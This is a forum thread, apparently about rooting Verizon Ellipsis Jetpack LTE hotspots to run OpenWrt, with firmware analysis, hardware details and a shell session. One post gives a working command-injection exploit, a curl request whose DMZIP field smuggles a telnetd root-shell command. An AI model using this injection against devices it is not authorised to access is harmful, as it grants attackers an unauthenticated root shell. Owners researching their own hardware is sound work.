Ellipsis Jetpack MHS800L: Potential GPL Violation

I have a Verizon Ellipsis Jetpack MHS800L LTE hotspot (designed by Franklin Wireless). I downloaded the firmware update package from here, ran binwalk on it, and found that it's running OpenWrt Barrier Breaker. Also, /etc/passwd and /etc/shadow are fully visible, so cracking the root password shouldn't be difficult.

There's no source available from either Verizon or Franklin. Here are some pictures of the board. I gave it a try, but couldn't find a UART. Does anything on here look like a UART to you guys? Here's the FCC data. There are these weird metal pieces on the plastic bumpers that bridge some of those pads on the side of the board (visible in FCC pictures). Does anyone know what that would do?

Also, it's running a telnet server, but connecting to it says "connection closed by foreign host." How do you think I get a shell over telnet?

1 Like

grafik

grafik

1 Like

That answers that question.

Hi, I've recently got a couple of these devices. Any updates on your progress?

Since I made that post, the firmware update page has been taking down, and my laptop's SSD died, so I don't have the firmware image anymore. It may be on my desktop, but I'm not certain. Also, if I find it, I'm not sure I can legally repost it.

Some updates:
There's a secret page in the firmware that allows you to (among other things) enable an SSH server, and upload firmware updates. The updates are tarballs with some kind of hashing/signature scheme. I also emailed Franklin Wireless a few times asking for source code, and have been ignored every time.

If you can't tell, it's been a long time. I haven't worked on this since the winter, but I may give it another shot.

Internal photos here.

It contains a VZ22Q module (see page 23 of 24 of the FCC page; the module is also contained in the technicolor MBHA10VWQ).

Its CPU is Broadcom's BCM63139, which IS NOT supported under the bcm63xx target (as it is actually an ARM CPU).

The closest OpenWrt-related thing I can find to this series of ARM xDSL-focused CPUs is this forum thread about a BCM63138-based board to which someone has CFE bootloader access.

I found a download link for the firmware updater.

Binwalking the updater exe gives you the rootfs. There are some hidden pages in the webserver (/etc/www). If you navigate to http://<the_router_ip>/webpst/labpst/index.html you'll find some interesting dev options that may be of use.

hello, i understand this thread is old but i want to share this to help more people: i got root on the MHS815L. I don't have an 800L but maybe someone can test on there.

basically: get the "jetpack" cookie when you log in,

curl 'http://router.ip/cgi-bin/settings_port_filtering.cgi' -X POST -H 'Cookie: jetpack=JETPACK_COOKIE_HERE' --data-raw '{"DMZEnable":true,"DMZIP":"192.168.69.12$(telnetd -l /bin/sh -p6969)","PFEnable":false,"ServiceEnable0":true,"ServiceName0":"Email(POP3,IMAP,SMTP)","ServiceEnable1":true,"ServiceName1":"FTP","ServiceEnable2":true,"ServiceName2":"HTTP","ServiceEnable3":true,"ServiceName3":"HTTPS","ServiceEnable4":true,"ServiceName4":"TELNET","Command":"Set","CustomCount":0}'

replace router.ip with the router ip (duh)
and replace JETPACK_COOKIE_HERE with the "jetpack" cookie from browser
then:
telnet router.ip 6969

full root shell :3

tested on: MHS815L
Firmware version: 4.1.4.1-24235
System Version: 4.1.4.1-24235

1 Like

I will test this on the MHS800L and let you know if it works there too.

I'd also be interested in reading a writeup on how you figured that out if you ever feel like putting one together.

1 Like

hi! i kind of forgot about the reply i made. did you ever manage to test it?

also, here's the writeup (although it's kind of short): https://vea.st/blog/verizon-router-writeup/

That was great! Thanks for sending.

I dug out my MHS800L, but it's in pieces. I can't find the antennas or case, and my laptop can't find its SSID when the router is on. We probably just need to attach some new antennas :slight_smile:

Will update here when we have more to say.

1 Like

It totally works :slight_smile:

telnet 192.168.15.1 6969
Trying 192.168.15.1...
Connected to 192.168.15.1.
Escape character is '^]'.


BusyBox v1.19.4 (2014-11-23 13:31:05 CET) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/usr/sbin # ls
brctl              frankwebd          sequansd
chroot             iptables           sqn4gRadio
crond              iptables-restore   sqnimsd
debug-omadm        iptables-save      sqnomadmd
dnsmasq            iw                 telnetd
dropbear           lighttpd           xtables-multi
franklin-web.fcgi  radvd
/usr/sbin #
1 Like

Turns out this thing is actually MIPS, not ARM.

/proc/cpuinfo:

system type		: SQN31x0 rev 0
machine			: Generic SQN31X0 board
processor		: 0
cpu model		: MIPS 24Kc V8.5
BogoMIPS		: 244.53
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 16
extra interrupt vector	: yes
hardware watchpoint	: yes, count: 4, address/irw mask: [0x0ff8, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented	: mips16
shadow register sets	: 1
kscratch registers	: 0
core			: 1
VCED exceptions		: not available
VCEI exceptions		: not available

/proc/meminfo:

MemTotal:          37620 kB
MemFree:            1224 kB
Buffers:            3892 kB
Cached:            14724 kB
SwapCached:            0 kB
Active:            12628 kB
Inactive:          12160 kB
Active(anon):       6508 kB
Inactive(anon):      212 kB
Active(file):       6120 kB
Inactive(file):    11948 kB
Unevictable:           0 kB
Mlocked:               0 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                 0 kB
Writeback:             0 kB
AnonPages:          6196 kB
Mapped:             7716 kB
Shmem:               548 kB
Slab:               8276 kB
SReclaimable:       1340 kB
SUnreclaim:         6936 kB
KernelStack:        1000 kB
PageTables:          504 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:       18808 kB
Committed_AS:     136112 kB
VmallocTotal:    1048372 kB
VmallocUsed:         608 kB
VmallocChunk:    1043724 kB

/proc/mtd:

dev:    size   erasesize  name
mtd0: 00080000 00010000 "spi0.0"
mtd1: 02000000 00040000 "spi0.2"
mtd2: 00060000 00010000 "Bootrom"
mtd3: 00040000 00040000 "Usim"
mtd4: 00040000 00040000 "Kvs"
mtd5: 00f00000 00040000 "kernel"
mtd6: 01000000 00040000 "region_fs"
mtd7: 00800000 00040000 "rootfs"
mtd8: 00200000 00040000 "rootfs_data"
mtd9: 00800000 00040000 "rootfs_next"
1 Like